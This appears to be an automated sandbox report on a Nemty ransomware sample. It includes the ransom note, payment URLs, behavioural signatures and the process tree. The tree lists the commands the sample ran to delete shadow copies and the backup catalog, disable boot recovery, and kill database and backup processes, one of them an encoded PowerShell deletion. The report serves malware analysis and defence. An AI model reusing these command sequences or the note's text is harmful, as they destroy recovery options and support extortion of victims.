Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
14-02-2020 02:22
General
-
Target
http://92.63.197.190/jap.exe
-
Sample
200214-87w9zpv2l2
Score
10/10
Malware Config
Extracted
Path
C:\NEMTY_MLK8D17-DECRYPT.txt
Family
nemty
Ransom Note
---> NEMTY 2.5 REVENGE <---
Some (or maybe all) of your files got encryped.
We provide decryption tool if you pay a ransom.
Don't worry, if we can't help you with decrypting - other people won't trust us.
We provide test decryption, as proof that we can decrypt your data.
You have 3 month to pay (after visiting the ransom page) until decryption key will be deleted from server.
After 3 month no one, even our service can't make decryptor.
1) Web-Browser
a) Open your browser.
b) Open this link: http://nemty.top/public/pay.php
c) Upload this file.
d) Follow the instructions.
2) Tor-Browser
a) Download&Install Tor-Browser.
b) Open Tor-Browser.
c) Open this link : http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
d) Upload this file.
e) Follow the instruction.
<BEGIN NEMTY KEY>
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
URLs
http://nemty.top/public/pay.php
http://zjoxyw5mkacojk5ptn2iprkivg5clow72mjkyk5ttubzxprjjnwapkad.onion/public/pay.php
Signatures
-
Executes dropped EXE 1 IoCs
-
Program crash 1 IoCs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Suspicious use of SetWindowsHookEx 6 IoCs
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies registry class 1 IoCs
-
Kills process with taskkill 14 IoCs
-
Nemty
Ransomware discovered in late 2019 which has been actively developed/updated over time.
-
Modifies Internet Explorer settings 1 TTPs 38 IoCs
-
Suspicious behavior: EnumeratesProcesses 107 IoCs
-
Drops file in Program Files directory 58 IoCs
-
Modifies service 2 TTPs 4 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 3 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Suspicious use of WriteProcessMemory 180 IoCs
-
Suspicious use of FindShellTrayWindow 102 IoCs
-
Suspicious use of AdjustPrivilegeToken 65 IoCs
-
Suspicious use of SendNotifyMessage 96 IoCs
-
Runs net.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://92.63.197.190/jap.exe1⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5096 CREDAT:82945 /prefetch:22⤵
- Suspicious use of SetWindowsHookEx
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5096 CREDAT:340998 /prefetch:22⤵
- Modifies Internet Explorer settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded4⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im sql.* & taskkill /f /im winword.* & taskkill /f /im wordpad.* & taskkill /f /im outlook.* & taskkill /f /im thunderbird.* & taskkill /f /im oracle.* & taskkill /f /im excel.* & taskkill /f /im onenote.* & taskkill /f /im virtualboxvm.* & taskkill /f /im node.* & taskkill /f /im QBW32.* & taskkill /f /im WBGX.* & taskkill /f /im Teams.* & taskkill /f /im Flow.*3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im sql.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im winword.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im wordpad.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im outlook.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im thunderbird.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im oracle.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im excel.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im onenote.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im virtualboxvm.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im node.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im QBW32.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im WBGX.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Teams.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Flow.*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c net stop DbxSvc & net stop OracleXETNSListener & net stop OracleServiceXE & net stop AcrSch2Svc & net stop AcronisAgent & net stop Apache2.4 & net stop SQLWriter & net stop MSSQL$SQLEXPRESS & net stop MSSQLServerADHelper100 & net stop MongoDB & net stop SQLAgent$SQLEXPRESS & net stop SQLBrowser & net stop CobianBackup11 & net stop cbVSCService11 & net stop QBCFMontorService & net stop QBVSS3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop DbxSvc4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DbxSvc5⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleXETNSListener4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleXETNSListener5⤵
-
C:\Windows\SysWOW64\net.exenet stop OracleServiceXE4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleServiceXE5⤵
-
C:\Windows\SysWOW64\net.exenet stop AcrSch2Svc4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc5⤵
-
C:\Windows\SysWOW64\net.exenet stop AcronisAgent4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent5⤵
-
C:\Windows\SysWOW64\net.exenet stop Apache2.44⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Apache2.45⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLWriter4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLWriter5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQL$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SQLEXPRESS5⤵
-
C:\Windows\SysWOW64\net.exenet stop MSSQLServerADHelper1004⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper1005⤵
-
C:\Windows\SysWOW64\net.exenet stop MongoDB4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MongoDB5⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLAgent$SQLEXPRESS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS5⤵
-
C:\Windows\SysWOW64\net.exenet stop SQLBrowser4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLBrowser5⤵
-
C:\Windows\SysWOW64\net.exenet stop CobianBackup114⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CobianBackup115⤵
-
C:\Windows\SysWOW64\net.exenet stop cbVSCService114⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop cbVSCService115⤵
-
C:\Windows\SysWOW64\net.exenet stop QBCFMontorService4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMontorService5⤵
-
C:\Windows\SysWOW64\net.exenet stop QBVSS4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBVSS5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet & wmic shadowcopy delete3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 6684⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Enumerates system info in registry
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt"3⤵
- Modifies registry class
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt4⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\89TS8EPW\jap.exe.64engns.partial
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\O3NMJQL8\jap[1].exe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\PLFRAX05.cookie
-
C:\Users\Admin\NEMTY_MLK8D17-DECRYPT.txt
-
memory/3752-22-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-26-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-11-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-12-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-13-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-14-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-15-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-16-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-17-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-18-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-19-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-20-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-21-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-10-0x00000000055F0000-0x00000000055F1000-memory.dmpFilesize
4KB
-
memory/3752-23-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-24-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-25-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-9-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-27-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-28-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-29-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-30-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-31-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-32-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-33-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-34-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-35-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-36-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-37-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-38-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-39-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-40-0x00000000031F0000-0x00000000031F1000-memory.dmpFilesize
4KB
-
memory/3752-4-0x0000000005500000-0x0000000005501000-memory.dmpFilesize
4KB
-
memory/3752-3-0x0000000004C30000-0x0000000004C31000-memory.dmpFilesize
4KB